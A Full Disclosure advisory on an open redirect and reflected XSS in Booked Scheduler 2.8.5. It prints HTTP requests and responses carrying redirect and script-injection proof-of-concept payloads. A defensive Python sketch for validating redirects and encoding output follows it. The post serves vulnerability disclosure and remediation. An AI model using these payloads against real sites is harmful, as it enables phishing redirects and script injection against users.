Message-ID: <CAF2Wu1Z0kEphk02Y-D-yfZ7E7rXSWo1ycw_-hpU0h1Z9mztxbw@mail.gmail.com>
Date: Mon, 28 Oct 2024 13:11:12 +0000
From: Andrey Stoykov <mwebsec@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Open Redirect / Reflected XSS - booked-schedulerv2.8.5

# Exploit Title: Open Redirect / Reflected XSS - booked-schedulerv2.8.5
# Date: 10/2024
# Exploit Author: Andrey Stoykov
# Version: 2.8.5
# Tested on: Ubuntu 22.04
# Blog:
https://msecureltd.blogspot.com/2024/10/friday-fun-pentest-series-13-reflected.html
https://msecureltd.blogspot.com/2024/10/friday-fun-pentest-series-12-open.html


Open Redirect:

Steps to Reproduce:

1. Log in and intercept the HTTP request with a proxy such as Burp Suite or ZAP
2. In the "resume" parameter add the redirect URL, e.g. a Burp Collaborator host
3. Forward the request

index.php

// HTTP POST login request

POST /Bookedbo8effotfu/Web/index.php HTTP/1.1
Host: localhost
Cookie: PHPSESSID=7c0a0ee0b401863e1a30acbebf301916; language=en_gb; fus_session=a15fcb9ef40abd1dece4c7fc35c2b58c; fus_visited=yes
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
[...]

email=admin&password=password&captcha=&login=submit&resume=https://urp4vilyopoly8dhq6xa2z8v0m6du3is.oastify.com&language=en_gbg


// HTTP response

HTTP/1.1 302 Found
Date: Sat, 12 Oct 2024 12:09:33 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: https://urp4vilyopoly8dhq6xa2z8v0m6du3is.oastify.com
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Reflected XSS:

reservation.php

// HTTP GET request

GET /Bookedbo8effotfu/Web/reservation.php?rid="><script>alert(document.domain)</script> HTTP/1.1
Host: localhost
Cookie: PHPSESSID=7c0a0ee0b401863e1a30acbebf301916; language=en_gb; new_version=v%3D2.8.5%2Cfs%3D1728734988; fus_session=a15fcb9ef40abd1dece4c7fc35c2b58c; fus_visited=yes
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate, br
Dnt: 1
Sec-Gpc: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive


// HTTP response

HTTP/1.1 200 OK
Date: Sat, 12 Oct 2024 12:23:55 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14003

<h5><a href="//localhost/Bookedbo8effotfu/Web/reservation.php?rid="><script>alert(document.domain)</script>">Return to the last page that you were on</a></h5>
</div>


schedule.php


// HTTP GET request

GET /Bookedldk0euwfjx/Web/schedule.php?dr="><script>alert(document.domain)</script> HTTP/1.1
Host: localhost
Cookie: PHPSESSID=c7aa15661bb6b0b72ab88132664b75c9; language=en_gb; resource_filter1=%7B%22ScheduleId%22%3A%221%22%2C%22ResourceIds%22%3A%5B%5D%2C%22ResourceTypeId%22%3Anull%2C%22MinCapacity%22%3Anull%2C%22ResourceAttributes%22%3A%5B%5D%2C%22ResourceTypeAttributes%22%3A%5B%5D%7D; schedule_calendar_toggle=false
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive


// HTTP response

HTTP/1.1 200 OK
Date: Sat, 19 Oct 2024 09:12:33 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 7853

<h5><a href="//localhost/Bookedldk0euwfjx/Web/schedule.php?dr="><script>alert(document.domain)</script>">Return to the last page that you were on
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
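Editorial note, added here and not part of the post above or of Booked Scheduler's own PHP code: the two findings have a common root, a request parameter ("resume", "rid", "dr") that reaches a redirect or an HTML attribute without validation or encoding. The Python sketch below shows the server-side checks a fix needs: a validator that only accepts an application-local path as the post-login redirect target, and attribute-safe rendering of the "Return to the last page" link. It assumes the application lives under /Web and that /Web/index.php is the default landing page; both are assumptions for the example, not values from the advisory.

```python
"""Defensive counterparts to the open redirect and reflected XSS above.
Illustrative Python, not Booked Scheduler's code. Assumed layout: the app
is served under /Web and /Web/index.php is the post-login landing page."""
import posixpath
from html import escape
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

APP_PREFIX = "/Web"             # assumption: application URL prefix
DEFAULT_LANDING = "/Web/index.php"  # assumption: safe fallback target


def safe_resume_target(resume: str) -> str:
    """Return a local path to redirect to after login, or the default
    landing page when `resume` cannot be shown to stay on this site.

    Rejected because a browser could treat them as another origin:
    absolute URLs (no leading slash), protocol-relative forms such as
    //host, ///host and /\\host, any backslash (browsers normalise it to
    a slash), tab or newline (stripped by the WHATWG URL parser), and
    dot segments that leave the application prefix."""
    if not resume or not resume.startswith("/"):
        return DEFAULT_LANDING
    if len(resume) > 1 and resume[1] in "/\\":
        return DEFAULT_LANDING
    if any(c in resume for c in "\\\t\r\n"):
        return DEFAULT_LANDING
    parts = urlsplit(resume)
    if parts.scheme or parts.netloc:        # belt and braces after the checks above
        return DEFAULT_LANDING
    path = posixpath.normpath(parts.path)   # resolves "." and ".." segments
    if path != APP_PREFIX and not path.startswith(APP_PREFIX + "/"):
        return DEFAULT_LANDING
    # Keep the query (it is local too); drop the fragment, which never
    # reaches the server and has no role in a Location header.
    return urlunsplit(("", "", path, parts.query, ""))


def return_link(script_path: str, query_string: str) -> str:
    """Render the 'Return to the last page that you were on' anchor safely.

    Two layers: the query string is re-serialised with urlencode(), so every
    reserved character in user-supplied values is percent-encoded, and the
    finished href is passed through html.escape(quote=True), so even a
    stray quote could not close the attribute."""
    query = urlencode(parse_qsl(query_string, keep_blank_values=True))
    href = urlunsplit(("", "", script_path, query, ""))
    return ('<h5><a href="%s">Return to the last page that you were on</a></h5>'
            % escape(href, quote=True))


if __name__ == "__main__":
    # Constructed inputs mirroring the advisory's two cases.
    print(safe_resume_target("https://attacker.example/"))        # -> /Web/index.php
    print(safe_resume_target("/Web/reservation.php?rid=5"))        # -> /Web/reservation.php?rid=5
    print(return_link("/Web/reservation.php",
                      'rid="><script>alert(document.domain)</script>'))
```

The redirect validator deliberately returns a fixed fallback rather than raising: a login flow should still complete when the "resume" value is unusable, it just should not follow it. The link renderer shows that output encoding on its own is enough to neutralise the reflected payload, and that rebuilding the query through urlencode() additionally removes the raw characters from the response body, which also keeps browser and WAF heuristics from firing on legitimate pages.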